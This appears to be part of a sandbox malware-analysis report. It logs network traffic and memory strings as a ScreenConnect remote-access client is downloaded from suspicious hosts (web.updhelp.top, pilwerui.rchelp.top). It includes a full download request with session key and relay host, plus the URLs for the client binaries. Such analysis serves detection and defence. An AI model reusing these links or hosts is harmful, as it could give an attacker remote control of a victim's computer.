                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: web.updhelp.top
                Source: global trafficDNS traffic detected: DNS query: pilwerui.rchelp.top
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D49000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.c
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: dfsvc.exe, 00000002.00000002.3932098452.000001C1FC69D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.2.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                Source: dfsvc.exe, 00000002.00000002.3936944841.000001C1FEF44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?81a1440
                Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.2.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0A
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://ocsp.digicert.com0X
                Source: dfsvc.exe, 00000002.00000002.3932098452.000001C1FC69D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                Source: dfsvc.exe, 00000002.00000002.3932098452.000001C1FC69D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sajatypeworks.comi
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sajatypeworks.comk
                Source: dfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsA
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3B11000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000011.00000002.4168160767.00000000019C3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.4165858393.000000000329F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://scripts.sil.org/OFL
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://web.updhelp.top
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr, ScreenConnect.WindowsFileManager.exe0.2.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: dfsvc.exe, 00000002.00000002.3936210855.000001C1FEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rg/2001/XMLSchema-instance6urn:schemas-microsoft-com:asm.v1
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: dfsvc.exe, 00000002.00000002.3937395741.000001C1FEFD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3E66000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E3F04000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150371790.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core=
                Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/cascadia-code/blob/main/LICENSE).
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/microsoft/cascadia-code/blob/master/LICENSE).
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFL
                Source: dfsvc.exe, 00000002.00000002.3932970282.000001C1FE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFL)
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.upH
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.upHzN
                Source: dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.S
                Source: dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.SCRECO~1.MANnt.applicaFXE
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Clie
                Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.application
                Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150518028.0000000000CE3000.00000004.00000020.00020000.00000000.sdmp, PFI5AX1V.log.2.drString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
                Source: dfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.application.exe
                Source: dfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.application089I8
                Source: dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.application6.VGOq
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3F04000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150883243.0000000002981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.application8
                Source: PFI5AX1V.log.2.drString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.top
                Source: dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationLW6.VGO
                Source: dfsvc.exe, 00000002.00000002.3935451395.000001C1FEE43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationLW6.VGOj
                Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150883243.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150883243.000000000298F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationP
                Source: dfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3935451395.000001C1FEE43000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.application_
                Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.3149557783.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationdb01k
                Source: dfsvc.exe, 00000002.00000002.3935908647.000001C1FEE8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationication
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.dll
                Source: ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150883243.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, PFI5AX1V.log.2.drString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.manifest
                Source: dfsvc.exe, 00000002.00000002.3936662225.000001C1FEF14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.manifest(
                Source: dfsvc.exe, 00000002.00000002.3932098452.000001C1FC69D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.manifestY
                Source: dfsvc.exe, 00000002.00000002.3932098452.000001C1FC69D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Client.manifesti
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.ClientSe
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3934976375.000001C1FE930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.ClientService.dll
                Source: dfsvc.exe, 00000002.00000002.3934976375.000001C1FE930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.ClientService.dlll
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.ClientService.exe
                Source: dfsvc.exe, 00000002.00000002.3936379230.000001C1FEEE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.ClientService.exeHL
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Core.dll
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Wind
                Source: dfsvc.exe, 00000002.00000002.3934976375.000001C1FE930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.Windows.dll
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstage
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exX
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3937277044.000001C1FEFC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                Source: dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe2
                Source: dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeU
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsC
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.ex
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E42D3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3934976375.000001C1FE930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe.config
                Source: dfsvc.exe, 00000002.00000002.3937485355.000001C1FEFEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe.config_
                Source: dfsvc.exe, 00000002.00000002.3934976375.000001C1FE930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exeL
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManag(
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.e
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4030000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.config
